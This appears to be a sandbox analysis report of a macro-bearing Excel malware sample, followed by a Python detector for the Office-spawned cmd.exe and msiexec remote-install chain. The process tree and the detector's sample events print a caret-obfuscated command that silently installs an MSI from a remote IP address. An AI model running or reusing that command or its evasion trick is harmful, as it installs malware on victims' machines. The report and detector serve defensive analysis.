Analysis
- max time kernel: 62s
- max time network: 64s
- platform: windows7_x64
- resource: win7
- submitted: 30-06-2020 17:58

Static task: static1
Behavioral task: behavioral1
- Sample: SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
- Resource: win7
Behavioral task: behavioral2
- Sample: SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
- Resource: win10v200430
General
- Target: SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
- Size: 172KB
- MD5: ac016bd363b76505c4b5f55fa92bf343
- SHA1: 245a98cac3ab0bb615aa265c2774e34c1fcf2bd3
- SHA256: 95bd7a62ced0c80358c8e3fd12bb8acb9aecea2b35fa43e7a343cb38ae233e5f
- SHA512: 812ed62c7379e690f3e9af0cde79d1e38e5ed0971f98f0662584ea885e03bc8b36e31dfc7c54a2be2f5989605ff59e6d53a4e4b7f875fff0f8ac9dc40bdbb7c2
Malware Config
Signatures
- Suspicious behavior: AddClipboardFormatListener 1 IoCs
  Processes:
    pid 1196  EXCEL.EXE
- Process spawned unexpected child process 1 IoCs
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    pid 1500  cmd.exe  (parent pid 1196 EXCEL.EXE): Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process
- Use of msiexec (install) with remote resource 1 IoCs
  Processes:
    pid 908  msiexec.exe
- Office loads VBA resources, possible macro or embedded object present
- Suspicious use of SetWindowsHookEx 3 IoCs
  Processes:
    pid 1196  EXCEL.EXE  (3 entries)
- Suspicious use of WriteProcessMemory 8 IoCs
  Processes:
    PID 1196 (EXCEL.EXE) wrote to memory of 1500 (cmd.exe)    3 entries
    PID 1500 (cmd.exe) wrote to memory of 908 (msiexec.exe)   5 entries
- Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  Processes:
    pid 908  msiexec.exe
- Suspicious use of AdjustPrivilegeToken 34 IoCs
  Processes (tokens listed in the order recorded; repeated names are separate IoCs):
    pid 640  msiexec.exe  (3):  SeRestorePrivilege, SeTakeOwnershipPrivilege, SeSecurityPrivilege
    pid 908  msiexec.exe  (31): SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
- Blacklisted process makes network request 1 IoCs
  Processes:
    flow 3  pid 640  msiexec.exe
Processes
- C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  (pid 1196)
  "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe  (pid 1500)
    "C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/new-order0456.msi /qn
    (ms^iE^x^ec is msiexec written with cmd.exe caret escapes; cmd strips the carets before launching the child, so a plain substring match for "msiexec" on the cmd.exe command line misses it, while the child's own command line below carries the clean name)
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\msiexec.exe  (pid 908)
      msiExec /i http://199.195.250.60/gg/new-order0456.msi /qn
      - Use of msiexec (install) with remote resource
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\msiexec.exe  (pid 640)
  C:\Windows\system32\msiexec.exe /V
  (the Windows Installer service instance that carries out the install requested by pid 908; it is this process, not the client started by cmd.exe, that makes the network request recorded above)
  - Suspicious use of AdjustPrivilegeToken
  - Blacklisted process makes network request
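The chain above (Office parent, cmd.exe with a caret-obfuscated command line, msiexec pulling an MSI over HTTP with /qn) is the kind of thing to detect from process-creation telemetry rather than from the sandbox verdict. The following is an added example, not part of the sandbox report or of any vendor's detection logic: it undoes cmd.exe caret escaping, extracts the remote resource handed to msiexec /i or /package, and walks parent PIDs to say whether an Office application sits at the root of the chain. The records are constructed from the process tree in this report in a Sysmon Event ID 1 style; the field names, the parent PIDs 600/480/1800 and the benign local-install record (pid 2000) are assumptions used to give the detector a negative case.

```python
"""Flag the Office -> cmd.exe -> msiexec remote-install chain shown in this report.

Added example, not part of the sandbox output. Input records mirror the process
tree above; the field names and the parent PIDs 600/480/1800 are assumptions,
as is the benign local-install record used as a negative case.
"""
import re
from urllib.parse import urlparse

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Children an Office process has no business spawning in most environments.
CHILD_IMAGES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "msiexec.exe"}
QUIET_FLAG = re.compile(r"[/-]q(?:n|b|r|f)?|[/-]quiet", re.IGNORECASE)


def deobfuscate_cmd(cmdline: str) -> str:
    """Undo cmd.exe caret escaping: outside double quotes, '^' makes the next
    character literal, which is how ms^iE^x^ec reaches CreateProcess as msiExec."""
    out, in_quote, i = [], False, 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == '"':
            in_quote = not in_quote
            out.append(c)
        elif c == "^" and not in_quote:
            i += 1                      # drop the caret, keep the escaped character
            if i < len(cmdline):
                out.append(cmdline[i])
        else:
            out.append(c)
        i += 1
    return "".join(out)


def image_name(path: str) -> str:
    """Basename of an image path or bare command token, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def remote_msi_resource(cmdline: str):
    """Return the http(s) URL passed to msiexec /i or /package, else None.
    The line is de-escaped first so obfuscated launches are not missed."""
    toks = deobfuscate_cmd(cmdline).split()
    names = [t.strip('"').lower() for t in toks]
    if not any(image_name(n) in ("msiexec", "msiexec.exe") for n in names):
        return None
    for i in range(len(names) - 1):
        t = names[i]
        if len(t) > 1 and t[0] in "/-" and t[1:] in ("i", "package"):
            res = toks[i + 1].strip('"')
            if urlparse(res).scheme in ("http", "https"):
                return res
    return None


def analyse(events):
    """One pass over process-creation records; returns a list of findings."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        pimg = image_name(parent["image"]) if parent else None
        if pimg in OFFICE_IMAGES and img in CHILD_IMAGES:
            findings.append({"pid": e["pid"], "rule": "office_spawned_child",
                             "detail": f"{pimg} (pid {e['ppid']}) -> {img}"})
        res = remote_msi_resource(e["commandline"])
        if res:
            # Walk ancestry (cycle-safe) so the alert says whether Office is in the chain.
            chain, seen, cur = [], set(), e
            while cur and cur["pid"] not in seen:
                seen.add(cur["pid"])
                chain.append(image_name(cur["image"]))
                cur = by_pid.get(cur["ppid"])
            clean = deobfuscate_cmd(e["commandline"]).split()
            findings.append({"pid": e["pid"], "rule": "msiexec_remote_install",
                             "resource": res,
                             "quiet": any(QUIET_FLAG.fullmatch(t) for t in clean),
                             "office_rooted": bool(set(chain) & OFFICE_IMAGES),
                             "chain": " <- ".join(chain)})
    return findings


# Constructed records mirroring the process tree in this report. PIDs 1196, 1500,
# 908 and 640 are the report's; ppids 600/480/1800 and the pid-2000 record are made up.
SAMPLE_EVENTS = [
    {"pid": 1196, "ppid": 600, "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "commandline": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls'},
    {"pid": 1500, "ppid": 1196, "image": r"C:\Windows\System32\cmd.exe",
     "commandline": r'"C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/new-order0456.msi /qn'},
    {"pid": 908, "ppid": 1500, "image": r"C:\Windows\system32\msiexec.exe",
     "commandline": r"msiExec /i http://199.195.250.60/gg/new-order0456.msi /qn"},
    {"pid": 640, "ppid": 480, "image": r"C:\Windows\system32\msiexec.exe",
     "commandline": r"C:\Windows\system32\msiexec.exe /V"},
    # Benign negative case: a local package installed silently by an admin.
    {"pid": 2000, "ppid": 1800, "image": r"C:\Windows\system32\msiexec.exe",
     "commandline": r"msiexec.exe /i C:\installers\7z1900-x64.msi /qn"},
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_EVENTS):
        print(finding)
```

Two findings fire on pid 1500 (Office spawned cmd.exe, and the de-escaped cmd.exe line itself carries the remote msiexec install) and one on pid 908; the service instance (pid 640, /V) and the local install (pid 2000) produce nothing. Matching on the child's own command line as well as the parent's is what keeps the detection working when the caret trick, or any other cmd.exe quoting game, is used on the launcher line only.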
Network
MITRE ATT&CK Matrix
Downloads
- memory/908-3-0x0000000000000000-mapping.dmp
- memory/908-4-0x0000000002320000-0x0000000002324000-memory.dmp  (16KB)
- memory/1196-0-0x0000000006180000-0x0000000006280000-memory.dmp  (1024KB)
- memory/1196-1-0x0000000006180000-0x0000000006280000-memory.dmp  (1024KB)
- memory/1500-2-0x0000000000000000-mapping.dmp